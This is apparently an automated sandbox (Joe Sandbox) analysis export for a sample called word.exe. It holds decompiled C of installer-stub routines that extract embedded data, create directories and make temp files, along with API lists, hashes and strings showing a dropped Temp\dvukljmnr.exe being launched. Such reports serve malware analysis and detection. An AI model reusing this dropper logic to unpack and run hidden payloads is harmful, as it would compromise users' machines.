                                                          0x0040319c
                                                          0x0040314b
                                                          0x00403161
                                                          0x00403166
                                                          0x00403166
                                                          0x00403149
                                                          0x004031a5
                                                          0x004031af
                                                          0x004031b9
                                                          0x004031c0
                                                          0x00000000
                                                          0x00000000
                                                          0x004031c6
                                                          0x004031d1
                                                          0x004031d3
                                                          0x00403207
                                                          0x0040320d
                                                          0x00000000
                                                          0x00000000
                                                          0x0040320f
                                                          0x00403211
                                                          0x00000000
                                                          0x00000000
                                                          0x00403213
                                                          0x00403213
                                                          0x00403226
                                                          0x00000000
                                                          0x00000000
                                                          0x00403235
                                                          0x0040324b
                                                          0x00403251
                                                          0x00403260
                                                          0x00403265
                                                          0x0040326c
                                                          0x0040326c
                                                          0x00000000
                                                          0x00403251
                                                          0x004031e3
                                                          0x004031eb
                                                          0x00403242
                                                          0x00403248
                                                          0x00403248
                                                          0x00000000
                                                          0x004031f3
                                                          0x004031f3
                                                          0x004031f9
                                                          0x004031ff
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403205
                                                          0x00403246
                                                          0x00403246
                                                          0x00000000
                                                          0x00403246
                                                          0x00000000
                                                          0x0040323d

                                                          APIs
                                                          • GetTickCount.KERNEL32(00000000,00000004,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF), ref: 004030A8
                                                            • Part of subcall function 004032AF: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EF6,?), ref: 004032BD
                                                          • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF), ref: 004030E7
                                                          • GetTickCount.KERNEL32(tCPInfo,00004000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF), ref: 0040316D
                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402BCA,?), ref: 00403196
                                                          • WriteFile.KERNELBASE(0040B090,0040CB56,000000FF,00000000,tCPInfo), ref: 004031E3
                                                          • SetFilePointer.KERNEL32(0005FC39,00000000,00000000,tCPInfo,00004000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020), ref: 00403235
                                                          • SendMessageA.USER32 ref: 00403265
                                                          • DestroyWindow.USER32 ref: 0040326C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$CountTick$CreateDestroyDialogMessageParamSendWindowWrite
                                                          • String ID: tCPInfo
                                                          • API String ID: 131999699-2120998202
                                                          • Opcode ID: 42578b057d0362633f9efa20e3f5837a8032a4944e8e1f2b1687a923ed4c40b4
                                                          • Instruction ID: 533e5dba32bddeac04eb0af6ed3ed2a018518d1e6048d9abc72f3d394191c675
                                                          • Opcode Fuzzy Hash: 42578b057d0362633f9efa20e3f5837a8032a4944e8e1f2b1687a923ed4c40b4
                                                          • Instruction Fuzzy Hash: 3C418B71A043049BD710DF65EE4496B3FBCF709356B11827EF611B22E1C739AA048BAD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040177F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 453 40177f-4017a2 call 402a85 call 405654 458 4017a4-4017aa call 405af4 453->458 459 4017ac-4017be call 405af4 call 4055e7 lstrcatA 453->459 464 4017c3-4017c9 call 405d03 458->464 459->464 469 4017ce-4017d2 464->469 470 4017d4-4017de call 405d9c 469->470 471 401805-401808 469->471 479 4017f0-401802 470->479 480 4017e0-4017ee CompareFileTime 470->480 472 401810-40182c call 4057cb 471->472 473 40180a-40180b call 4057ac 471->473 481 4018a4-4018cd call 404e9f call 402f71 472->481 482 40182e-401831 472->482 473->472 479->471 480->479 496 4018d5-4018e1 SetFileTime 481->496 497 4018cf-4018d3 481->497 483 401833-401875 call 405af4 * 2 call 405b16 call 405af4 call 4053c2 482->483 484 401886-401890 call 404e9f 482->484 483->469 516 40187b-40187c 483->516 494 401899-40189f 484->494 499 402923 494->499 498 4018e7-4018f2 CloseHandle 496->498 497->496 497->498 501 4018f8-4018fb 498->501 502 40291a-40291d 498->502 503 402925-402929 499->503 505 401910-401913 call 405b16 501->505 506 4018fd-40190e call 405b16 lstrcatA 501->506 502->499 513 401918-402276 call 4053c2 505->513 506->513 513->503 520 4026bf-4026c6 513->520 516->494 518 40187e-40187f 516->518 518->484 520->502
                                                          C-Code - Quality: 70%
                                                          			E0040177F(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				CHAR* _t81;
				void* _t83;
				void* _t85;

				_t75 = __ebx;
				_t81 = E00402A85(0x31);
				 *(_t85 - 0x3c) = _t81;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E00405654(_t81);
				_push(_t81);
				if(_t33 == 0) {
					lstrcatA(E004055E7(E00405AF4(0x4093f8, "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x4093f8);
					E00405AF4();
				}
				E00405D03(0x4093f8);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D9C(0x4093f8);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004057AC(0x4093f8);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E004057CB(0x4093f8, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E9F(0xffffffe2,  *(_t85 - 0x3c));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423fa8;
						goto L32;
					} else {
						E00405AF4(0x409bf8, 0x424000);
						E00405AF4(0x424000, 0x4093f8);
						E00405B16(_t75, 0x4093f8, 0x409bf8, "C:\Users\Albus\AppData\Local\Temp",  *((intOrPtr*)(_t85 - 0x10)));
						E00405AF4(0x424000, 0x409bf8);
						_t62 = E004053C2("C:\Users\Albus\AppData\Local\Temp",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423fa8 =  &( *0x423fa8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x4093f8);
								_push(0xfffffffa);
								E00404E9F();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E9F(0xffffffea,  *(_t85 - 0x3c));
				 *0x409250 =  *0x409250 + 1;
				_t43 = E00402F71(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x409250 =  *0x409250 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t83 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 8)); // executed
				__eflags = _t83 - _t75;
				if(_t83 >= _t75) {
					goto L31;
				} else {
					__eflags = _t83 - 0xfffffffe;
					if(_t83 != 0xfffffffe) {
						E00405B16(_t75, 0x4093f8, _t83, 0x4093f8, 0xffffffee);
					} else {
						E00405B16(_t75, 0x4093f8, _t83, 0x4093f8, 0xffffffe9);
						lstrcatA(0x4093f8,  *(_t85 - 0x3c));
					}
					_push(0x200010);
					_push(0x4093f8);
					E004053C2();
					goto L29;
				}
				goto L33;
			}
















                                                          0x0040177f
                                                          0x00401786
                                                          0x0040178f
                                                          0x00401792
                                                          0x00401795
                                                          0x004017a1
                                                          0x004017a2
                                                          0x004017be
                                                          0x004017a4
                                                          0x004017a4
                                                          0x004017a5
                                                          0x004017a5
                                                          0x004017c4
                                                          0x004017ce
                                                          0x004017ce
                                                          0x004017d2
                                                          0x004017d5
                                                          0x004017da
                                                          0x004017dc
                                                          0x004017de
                                                          0x004017e3
                                                          0x004017e3
                                                          0x004017ee
                                                          0x004017ee
                                                          0x004017ff
                                                          0x00401801
                                                          0x00401801
                                                          0x00401802
                                                          0x00401802
                                                          0x00401805
                                                          0x00401808
                                                          0x0040180b
                                                          0x0040180b
                                                          0x00401812
                                                          0x00401821
                                                          0x00401826
                                                          0x00401829
                                                          0x0040182c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040182e
                                                          0x00401831
                                                          0x0040188b
                                                          0x00401890
                                                          0x004015b0
                                                          0x004026bf
                                                          0x004026bf
                                                          0x0040291a
                                                          0x0040291d
                                                          0x0040291d
                                                          0x00000000
                                                          0x00401833
                                                          0x00401839
                                                          0x00401844
                                                          0x00401851
                                                          0x0040185c
                                                          0x00401872
                                                          0x00401872
                                                          0x00401875
                                                          0x00000000
                                                          0x0040187b
                                                          0x0040187b
                                                          0x0040187c
                                                          0x00401899
                                                          0x00402923
                                                          0x00402923
                                                          0x00402923
                                                          0x0040187e
                                                          0x0040187e
                                                          0x0040187f
                                                          0x00401492
                                                          0x00402271
                                                          0x00402271
                                                          0x00402271
                                                          0x0040187c
                                                          0x00401875
                                                          0x00402925
                                                          0x00402929
                                                          0x00402929
                                                          0x004018a9
                                                          0x004018ae
                                                          0x004018bc
                                                          0x004018c1
                                                          0x004018c7
                                                          0x004018cb
                                                          0x004018cd
                                                          0x004018d5
                                                          0x004018e1
                                                          0x004018cf
                                                          0x004018cf
                                                          0x004018d3
                                                          0x00000000
                                                          0x00000000
                                                          0x004018d3
                                                          0x004018ea
                                                          0x004018f0
                                                          0x004018f2
                                                          0x00000000
                                                          0x004018f8
                                                          0x004018f8
                                                          0x004018fb
                                                          0x00401913
                                                          0x004018fd
                                                          0x00401900
                                                          0x00401909
                                                          0x00401909
                                                          0x00401918
                                                          0x0040191d
                                                          0x0040226c
                                                          0x00000000
                                                          0x0040226c
                                                          0x00000000

                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BE
                                                          • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,00000000,00000000,C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017E8
                                                            • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,00423720,NSIS Error), ref: 00405B01
                                                            • Part of subcall function 00404E9F: lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
                                                            • Part of subcall function 00404E9F: lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
                                                            • Part of subcall function 00404E9F: lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
                                                            • Part of subcall function 00404E9F: SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F33
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F4D
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F5B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
                                                          • API String ID: 1941528284-1271094087
                                                          • Opcode ID: b97167aada2fa4578f9a117d5a902ee8dbf52284c50a83dde4a4e1865d353282
                                                          • Instruction ID: c1706ba1e04a40909550e17ecf840e167a7961d0d42511267d0e2aa6186e8961
                                                          • Opcode Fuzzy Hash: b97167aada2fa4578f9a117d5a902ee8dbf52284c50a83dde4a4e1865d353282
                                                          • Instruction Fuzzy Hash: 1941D331A10104BACB11BFA5DC85EBF3678EB85368B20423FF521F10E2CA7C49419B6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402F71 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 521 402f71-402f80 522 402f82-402f98 SetFilePointer 521->522 523 402f9e-402fa9 call 40309c 521->523 522->523 526 403095-403099 523->526 527 402faf-402fc9 ReadFile 523->527 528 403092 527->528 529 402fcf-402fd2 527->529 531 403094 528->531 529->528 530 402fd8-402feb call 40309c 529->530 530->526 534 402ff1-402ff4 530->534 531->526 535 403061-403067 534->535 536 402ff6-402ff9 534->536 537 403069 535->537 538 40306c-40307f ReadFile 535->538 539 40308d-403090 536->539 540 402fff 536->540 537->538 538->528 541 403081-40308a 538->541 539->526 542 403004-40300c 540->542 541->539 543 403011-403023 ReadFile 542->543 544 40300e 542->544 543->528 545 403025-403028 543->545 544->543 545->528 546 40302a-40303f WriteFile 545->546 547 403041-403044 546->547 548 40305d-40305f 546->548 547->548 549 403046-403059 547->549 548->531 549->542 550 40305b 549->550 550->539
                                                          C-Code - Quality: 93%
                                                          			E00402F71(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423f78;
					 *0x4170d4 = _t44;
					SetFilePointer( *0x409024, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040309C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409024,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x4170d4 =  *0x4170d4 + _t57;
						_t32 = E0040309C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409024, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x4170d4 =  *0x4170d4 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409024, 0x413090, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413090, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x4170d4 =  *0x4170d4 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

















                                                          0x00402f76
                                                          0x00402f80
                                                          0x00402f89
                                                          0x00402f8d
                                                          0x00402f98
                                                          0x00402f98
                                                          0x00402fa0
                                                          0x00402fa2
                                                          0x00402fa9
                                                          0x00402fc5
                                                          0x00402fc9
                                                          0x00403092
                                                          0x00403092
                                                          0x00000000
                                                          0x00402fd8
                                                          0x00402fdb
                                                          0x00402fe1
                                                          0x00402fe8
                                                          0x00402feb
                                                          0x00402ff4
                                                          0x00403061
                                                          0x00403067
                                                          0x00403069
                                                          0x00403069
                                                          0x0040307b
                                                          0x0040307f
                                                          0x00000000
                                                          0x00403081
                                                          0x00403081
                                                          0x00403084
                                                          0x0040308a
                                                          0x00000000
                                                          0x0040308a
                                                          0x00402ff6
                                                          0x00402ff9
                                                          0x0040308d
                                                          0x0040308d
                                                          0x00402fff
                                                          0x00403004
                                                          0x00403004
                                                          0x0040300c
                                                          0x0040300e
                                                          0x0040300e
                                                          0x0040301f
                                                          0x00403023
                                                          0x00000000
                                                          0x00000000
                                                          0x00403037
                                                          0x0040303f
                                                          0x0040305d
                                                          0x00403094
                                                          0x00403094
                                                          0x00403046
                                                          0x00403046
                                                          0x00403049
                                                          0x0040304c
                                                          0x0040304f
                                                          0x00403059
                                                          0x00000000
                                                          0x0040305b
                                                          0x00000000
                                                          0x0040305b
                                                          0x00403059
                                                          0x00000000
                                                          0x0040303f
                                                          0x00000000
                                                          0x00403004
                                                          0x00402ff9
                                                          0x00402ff4
                                                          0x00402feb
                                                          0x00402fc9
                                                          0x00403095
                                                          0x00403099

                                                          APIs
                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF,00000000,00000000,?,?), ref: 00402F98
                                                          • ReadFile.KERNELBASE(?,00000004,?,00000000,00000004), ref: 00402FC5
                                                          • ReadFile.KERNELBASE(tCPInfo,00004000,?,00000000,?), ref: 0040301F
                                                          • WriteFile.KERNELBASE(00000000,tCPInfo,?,000000FF,00000000), ref: 00403037
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$Read$PointerWrite
                                                          • String ID: tCPInfo
                                                          • API String ID: 2113905535-2120998202
                                                          • Opcode ID: 85f9b32b3f954e73cf89dba4bc253831fee770f0b6474c0430461d584885da6e
                                                          • Instruction ID: 921f3f76ada69b898c24bbee4c45453848788fed2ed6be28b521a649f4e8a62f
                                                          • Opcode Fuzzy Hash: 85f9b32b3f954e73cf89dba4bc253831fee770f0b6474c0430461d584885da6e
                                                          • Instruction Fuzzy Hash: 31313A31901209FBDF21CF65DD44AAE7FBCEB45365F20843BFA04A6194D2349E40DB69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004015BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 551 4015bb-4015ce call 402a85 call 40567b 556 4015d0-4015eb call 405612 CreateDirectoryA 551->556 557 401612-401615 551->557 566 401608-401610 556->566 567 4015ed-4015f8 GetLastError 556->567 558 401635-4021bf call 401423 557->558 559 401617-401630 call 401423 call 405af4 SetCurrentDirectoryA 557->559 572 40291a-402929 558->572 559->572 566->556 566->557 568 401605 567->568 569 4015fa-401603 GetFileAttributesA 567->569 568->566 569->566 569->568
                                                          C-Code - Quality: 85%
                                                          			E004015BB(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A85(0xfffffff0);
				_t10 = E0040567B(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405612(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405AF4("C:\\Users\\Albus\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                          0x004015bb
                                                          0x004015c2
                                                          0x004015c5
                                                          0x004015ca
                                                          0x004015ce
                                                          0x004015d0
                                                          0x004015d8
                                                          0x004015de
                                                          0x004015e0
                                                          0x004015e3
                                                          0x004015eb
                                                          0x004015f8
                                                          0x00401605
                                                          0x00401605
                                                          0x004015fa
                                                          0x004015fb
                                                          0x00401603
                                                          0x00000000
                                                          0x00000000
                                                          0x00401603
                                                          0x004015f8
                                                          0x00401608
                                                          0x0040160b
                                                          0x0040160d
                                                          0x0040160e
                                                          0x004015d0
                                                          0x00401615
                                                          0x00401635
                                                          0x004021ba
                                                          0x00401617
                                                          0x00401619
                                                          0x00401624
                                                          0x0040162a
                                                          0x0040162a
                                                          0x0040291d
                                                          0x00402929

                                                          APIs
                                                            • Part of subcall function 0040567B: CharNextA.USER32(:T@), ref: 00405689
                                                            • Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040568E
                                                            • Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040569D
                                                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015FB
                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040162A
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 0040161F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 3751793516-2935972921
                                                          • Opcode ID: ac794f138ba7f61467d4ebe51835dd724794318f642f069794646da26921047b
                                                          • Instruction ID: 63bcb5d4f1e8c965e9b2f85ce20a33f9a17abe043d5819b309257051beb803d0
                                                          • Opcode Fuzzy Hash: ac794f138ba7f61467d4ebe51835dd724794318f642f069794646da26921047b
                                                          • Instruction Fuzzy Hash: B9012B31908050ABDB216F755D4497F3774DA55325B28063FF4D2B32E2D63C0D42962E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004057FA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 576 4057fa-405804 577 405805-40582f GetTickCount GetTempFileNameA 576->577 578 405831-405833 577->578 579 40583e-405840 577->579 578->577 580 405835 578->580 581 405838-40583b 579->581 580->581
                                                          C-Code - Quality: 100%
                                                          			E004057FA(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                          0x004057fe
                                                          0x00405804
                                                          0x00405805
                                                          0x00405805
                                                          0x00405806
                                                          0x0040580d
                                                          0x00405817
                                                          0x00405824
                                                          0x00405827
                                                          0x0040582f
                                                          0x00000000
                                                          0x00000000
                                                          0x00405833
                                                          0x00000000
                                                          0x00000000
                                                          0x00405835
                                                          0x00000000
                                                          0x00405835
                                                          0x00000000

                                                          APIs
                                                          • GetTickCount.KERNEL32(C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032F8,1033,C:\Users\user\AppData\Local\Temp\), ref: 0040580D
                                                          • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 00405827
                                                          Strings
